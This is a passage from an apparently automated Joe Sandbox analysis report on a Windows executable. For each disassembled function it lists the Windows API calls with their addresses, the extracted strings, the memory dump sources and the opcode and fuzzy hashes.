                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 00D90F93
                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00D91023
                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00D91042
                                                                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00D91116
                                                                                                      • WSACleanup.WSOCK32 ref: 00D9111C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                      • String ID: Ping
                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                      • Opcode ID: d79c307b4b4396a06fde0853f16b9defce5c51e739a6c69a8ed37b803f297dce
                                                                                                      • Instruction ID: 45338b6c2fb316aa20177b54bb134dac1747e1a493bb86584e1d5a04702b49d8
                                                                                                      • Opcode Fuzzy Hash: d79c307b4b4396a06fde0853f16b9defce5c51e739a6c69a8ed37b803f297dce
                                                                                                      • Instruction Fuzzy Hash: AF919E35604342AFDB20DF15D489B16BBE1EF44318F188599F4A98B7A2C731ED85CBA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcslen$BuffCharLower
                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                      • API String ID: 707087890-567219261
                                                                                                      • Opcode ID: 89c2273aea45c17e6679963ed682db8b66c9ddbfca4b7ec04853dad8edcc1d0f
                                                                                                      • Instruction ID: 7e87eb20889b54b1529a69775195c347088c5d91afa04e0f92431b198d267033
                                                                                                      • Opcode Fuzzy Hash: 89c2273aea45c17e6679963ed682db8b66c9ddbfca4b7ec04853dad8edcc1d0f
                                                                                                      • Instruction Fuzzy Hash: C2517E32A00116ABCF14DFACC9619FDB3A5AF25364B24422DE866E7284EB35DD40C7B0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetLocalTime.KERNEL32(?), ref: 00D88BB1
                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D88BC1
                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D88BCD
                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D88C6A
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D88C7E
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D88CB0
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00D88CE6
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D88CEF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                      • String ID: *.*
                                                                                                      • API String ID: 1464919966-438819550
                                                                                                      • Opcode ID: 431a35e66a310fc81ddb4a0e63a1bae4c652f7df6f600ca7a176fe1c7008c17c
                                                                                                      • Instruction ID: 3b128d9ad66308211ee2ff5c225642167236d20336813b8632ab690cdb26d7ac
                                                                                                      • Opcode Fuzzy Hash: 431a35e66a310fc81ddb4a0e63a1bae4c652f7df6f600ca7a176fe1c7008c17c
                                                                                                      • Instruction Fuzzy Hash: 696149B2504305AFC710EF60D844AAEB3E9FF89310F44881AF98987251EB31E945CBB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00D83D29
                                                                                                        • Part of subcall function 00D1B25F: _wcslen.LIBCMT ref: 00D1B269
                                                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00D83D4A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LoadString$_wcslen
                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                                      • API String ID: 4099089115-3080491070
                                                                                                      • Opcode ID: 26c523ac9b00e0bdcb1c6168375c605e16667f2363049e894514c43779e5027d
                                                                                                      • Instruction ID: b20536dbf469c8dbd1addec0435fdf2db4d88cabc87c7915762246c9748566d8
                                                                                                      • Opcode Fuzzy Hash: 26c523ac9b00e0bdcb1c6168375c605e16667f2363049e894514c43779e5027d
                                                                                                      • Instruction Fuzzy Hash: D1516D31900249BADB15FBE0ED42EEEB779EF14300F144066B409A21A2EF756F99DB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                      • API String ID: 1256254125-769500911
                                                                                                      • Opcode ID: bd477a2785d2fbcabb389ae2ab8a86c71c726f95d8bb3d041ca69082ee41fdf6
                                                                                                      • Instruction ID: 2db6c709bea259ba5659e03b680bccea1b565ea0a5d20bed411f0481a10b33ac
                                                                                                      • Opcode Fuzzy Hash: bd477a2785d2fbcabb389ae2ab8a86c71c726f95d8bb3d041ca69082ee41fdf6
                                                                                                      • Instruction Fuzzy Hash: 6741C932A011269ACB105E7CCC506BEF7A5BF61B64B28852BF469D7244F736CD81CBB0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00D85CFA
                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00D85D70
                                                                                                      • GetLastError.KERNEL32 ref: 00D85D7A
                                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00D85E01
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                      • API String ID: 4194297153-14809454
                                                                                                      • Opcode ID: 517ae198ca3065fac4f51363f56b972df403a3204d04dfcb22bf50e175fdc5bd
                                                                                                      • Instruction ID: 8e9d37b23648d3697324c088d39cf0f5f6e14dc5fb0f1bdd6d58478ad4776cfe
                                                                                                      • Opcode Fuzzy Hash: 517ae198ca3065fac4f51363f56b972df403a3204d04dfcb22bf50e175fdc5bd
                                                                                                      • Instruction Fuzzy Hash: 70317335A006459FCB11EF68D488AAABBB6EF05314F188095E806DB3A6D731DD45CBB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • CreateMenu.USER32 ref: 00DA45D8
                                                                                                      • SetMenu.USER32(?,00000000), ref: 00DA45E7
                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DA466F
                                                                                                      • IsMenu.USER32(?), ref: 00DA4683
                                                                                                      • CreatePopupMenu.USER32 ref: 00DA468D
                                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DA46BA
                                                                                                      • DrawMenuBar.USER32 ref: 00DA46C2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                      • String ID: 0$F
                                                                                                      • API String ID: 161812096-3044882817
                                                                                                      • Opcode ID: dc6b90ceb9aac0fa9e5b39ce851796cff37f2b9795faf197fc4b4a4b18eba66a
                                                                                                      • Instruction ID: 25513a2b2e8e3e324189fc9effc5ccc2c57173c385618f201dad9e835a18e8a7
                                                                                                      • Opcode Fuzzy Hash: dc6b90ceb9aac0fa9e5b39ce851796cff37f2b9795faf197fc4b4a4b18eba66a
                                                                                                      • Instruction Fuzzy Hash: 60410875A01309AFDB14DF64D894AEA7BB5FF4A314F184029FA469B350DB71A920CF60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1B25F: _wcslen.LIBCMT ref: 00D1B269
                                                                                                        • Part of subcall function 00D74536: GetClassNameW.USER32(?,?,000000FF), ref: 00D74559
                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00D727F4
                                                                                                      • GetDlgCtrlID.USER32 ref: 00D727FF
                                                                                                      • GetParent.USER32 ref: 00D7281B
                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D7281E
                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00D72827
                                                                                                      • GetParent.USER32(?), ref: 00D7283B
                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D7283E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                      • String ID: ComboBox$ListBox
                                                                                                      • API String ID: 711023334-1403004172
                                                                                                      • Opcode ID: 5512c082b1ee1f1814b5ccb051c778a21b3adb9e0b6548d842abec6032a40522
                                                                                                      • Instruction ID: 1f6f1149881073cfea2115cd89c74fceb10ee270e74fb33a086e66648a30eda0
                                                                                                      • Opcode Fuzzy Hash: 5512c082b1ee1f1814b5ccb051c778a21b3adb9e0b6548d842abec6032a40522
                                                                                                      • Instruction Fuzzy Hash: CD21F270900218BBCF05AFA0DC85EFEBBB5EF06310F144156B9A6A72A1DB758808CB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00D1B25F: _wcslen.LIBCMT ref: 00D1B269
                                                                                                        • Part of subcall function 00D74536: GetClassNameW.USER32(?,?,000000FF), ref: 00D74559
                                                                                                      • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00D728D3
                                                                                                      • GetDlgCtrlID.USER32 ref: 00D728DE
                                                                                                      • GetParent.USER32 ref: 00D728FA
                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D728FD
                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00D72906
                                                                                                      • GetParent.USER32(?), ref: 00D7291A
                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00D7291D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                      • String ID: ComboBox$ListBox
                                                                                                      • API String ID: 711023334-1403004172
                                                                                                      • Opcode ID: 00bff428b0d1e64b5cc847c0d6b48b244055cc24201939ddd06dea3e34b066c6
                                                                                                      • Instruction ID: 85057134d148ffaa5eb61cc3f45d86a8a78121108282ece80de728161b71532d
                                                                                                      • Opcode Fuzzy Hash: 00bff428b0d1e64b5cc847c0d6b48b244055cc24201939ddd06dea3e34b066c6
                                                                                                      • Instruction Fuzzy Hash: FF21F675D00218BBCF11AFA0DC45EFEBBB9EF05310F148156B996A3295DB758848DB70
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DA43FC
                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DA43FF
                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00DA4426
                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DA4449
                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DA44C1
                                                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00DA450B
                                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00DA4526
                                                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00DA4541
                                                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00DA4555
                                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00DA4572
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$LongWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 312131281-0
                                                                                                      • Opcode ID: 5a4549edf4cba0c530f5b53519d5f39cdee2decb8123ded255b0e8f27d2103da
                                                                                                      • Instruction ID: 9d3b12a08c02922b12a88b8d13750fc42d0fd214aa9e0822b4d6c5b1cb7df495
                                                                                                      • Opcode Fuzzy Hash: 5a4549edf4cba0c530f5b53519d5f39cdee2decb8123ded255b0e8f27d2103da
                                                                                                      • Instruction Fuzzy Hash: 99617B75900248AFDB11DFA8CC81EEE77B8EB4A310F144169FA14E72A1C7B0A945DF60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00D7BA2D
                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00D7AABD,?,00000001), ref: 00D7BA41
                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00D7BA48
                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D7AABD,?,00000001), ref: 00D7BA57
                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00D7BA69
                                                                                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00D7AABD,?,00000001), ref: 00D7BA82
                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00D7AABD,?,00000001), ref: 00D7BA94
                                                                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00D7AABD,?,00000001), ref: 00D7BAD9
                                                                                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00D7AABD,?,00000001), ref: 00D7BAEE
                                                                                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00D7AABD,?,00000001), ref: 00D7BAF9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                      • String ID:
                                                                                                      • API String ID: 2156557900-0
                                                                                                      • Opcode ID: 391b63617829d2a27872052e43c5b0de8db1bd83594e5e78f35e70a988b78ce4
                                                                                                      • Instruction ID: 810a036a7c5f420ba3c67a49aa4a6c27d0654e1b378f165583675d69a4360c40
                                                                                                      • Opcode Fuzzy Hash: 391b63617829d2a27872052e43c5b0de8db1bd83594e5e78f35e70a988b78ce4
                                                                                                      • Instruction Fuzzy Hash: 04316F71500304AFDB14FF15EC88BA97BAAAB45321F19C426FA0ADB290E7F4DD408B74
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 00D43024
                                                                                                        • Part of subcall function 00D42D58: RtlFreeHeap.NTDLL(00000000,00000000,?,00D4DB71,00DE1DC4,00000000,00DE1DC4,00000000,?,00D4DB98,00DE1DC4,00000007,00DE1DC4,?,00D4DF95,00DE1DC4), ref: 00D42D6E
                                                                                                        • Part of subcall function 00D42D58: GetLastError.KERNEL32(00DE1DC4,?,00D4DB71,00DE1DC4,00000000,00DE1DC4,00000000,?,00D4DB98,00DE1DC4,00000007,00DE1DC4,?,00D4DF95,00DE1DC4,00DE1DC4), ref: 00D42D80
                                                                                                      • _free.LIBCMT ref: 00D43030
                                                                                                      • _free.LIBCMT ref: 00D4303B
                                                                                                      • _free.LIBCMT ref: 00D43046
                                                                                                      • _free.LIBCMT ref: 00D43051
                                                                                                      • _free.LIBCMT ref: 00D4305C
                                                                                                      • _free.LIBCMT ref: 00D43067
                                                                                                      • _free.LIBCMT ref: 00D43072
                                                                                                      • _free.LIBCMT ref: 00D4307D
                                                                                                      • _free.LIBCMT ref: 00D4308B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 0c33b082602d769882ece8054d43d264742be7d02d41b5d7e5825fa00cd7adef
                                                                                                      • Instruction ID: 49b30ac669220cf3e694b82d2ddbb89a4f626d36901fde885f54ad0b08487ece
                                                                                                      • Opcode Fuzzy Hash: 0c33b082602d769882ece8054d43d264742be7d02d41b5d7e5825fa00cd7adef
                                                                                                      • Instruction Fuzzy Hash: 4B117476910148BFCB01EF54C842CED3BA5EF05350B9145A5BA189B232DBB1DED19FA0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00D88907
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D8891B
                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00D88945
                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00D8895F
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D88971
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00D889BA
                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00D88A0A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000C.00000002.1929397374.0000000000D11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D10000, based on PE: true
                                                                                                      • Associated: 0000000C.00000002.1929378372.0000000000D10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DAD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929457205.0000000000DD3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929505456.0000000000DDD000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 0000000C.00000002.1929524856.0000000000DE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_12_2_d10000_ef2dsio342ai.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentDirectory$AttributesFile
                                                                                                      • String ID: *.*
                                                                                                      • API String ID: 769691225-438819550
                                                                                                      • Opcode ID: d14bb24f09d56492a5cf5bbf35de9e662263df9911c5387165c33a635c6f2c3e
                                                                                                      • Instruction ID: 8cbbe34e437f1ab9cfa5b31493c22eb53f5dcbc1496fef5954a7d82ceca6ea13
                                                                                                      • Opcode Fuzzy Hash: d14bb24f09d56492a5cf5bbf35de9e662263df9911c5387165c33a635c6f2c3e
                                                                                                      • Instruction Fuzzy Hash: D1818F725043019FCB24FF54D884AAAB7E9FF89310F98481AF885D7251EB34D945DBB2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00D17387
                                                                                                        • Part of subcall function 00D17417: GetClientRect.USER32(?,?), ref: 00D1743D
